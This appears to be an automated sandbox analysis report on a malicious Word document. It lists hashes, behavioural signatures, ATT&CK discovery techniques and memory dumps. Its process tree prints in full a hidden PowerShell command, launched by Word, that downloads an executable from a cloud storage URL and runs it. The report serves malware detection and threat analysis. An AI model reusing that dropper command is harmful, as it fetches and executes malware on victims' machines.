Analysis

  • max time kernel
    105s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 04:00

General

  • Target

    7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7.doc

  • Size

    30KB

  • MD5

    ac75ab65297e0443bc14fa2025273310

  • SHA1

    436719387ae939ae31aba47db8a3ae380d7dd09c

  • SHA256

    7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7

  • SHA512

    f767dbef9cd943fff0fd0474eafb1bc842833908881650141a7e35eea2d249626eaea6d6f2c76150172cf8b94c484aecf02edef6c04cdf8f3c68ffa03eb32470

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "('https://storage.googleapis.com/auto_connect/Quotation_Request.exe','')|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1496

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1496-137-0x0000000000000000-mapping.dmp
  • memory/1496-139-0x00007FF8699C0000-0x00007FF86A481000-memory.dmp
    Filesize

    10.8MB

  • memory/1496-138-0x000001AC263F0000-0x000001AC26412000-memory.dmp
    Filesize

    136KB

  • memory/4176-133-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-134-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-135-0x00007FF853110000-0x00007FF853120000-memory.dmp
    Filesize

    64KB

  • memory/4176-136-0x00007FF853110000-0x00007FF853120000-memory.dmp
    Filesize

    64KB

  • memory/4176-130-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-132-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-131-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-141-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-142-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-143-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB

  • memory/4176-144-0x00007FF855170000-0x00007FF855180000-memory.dmp
    Filesize

    64KB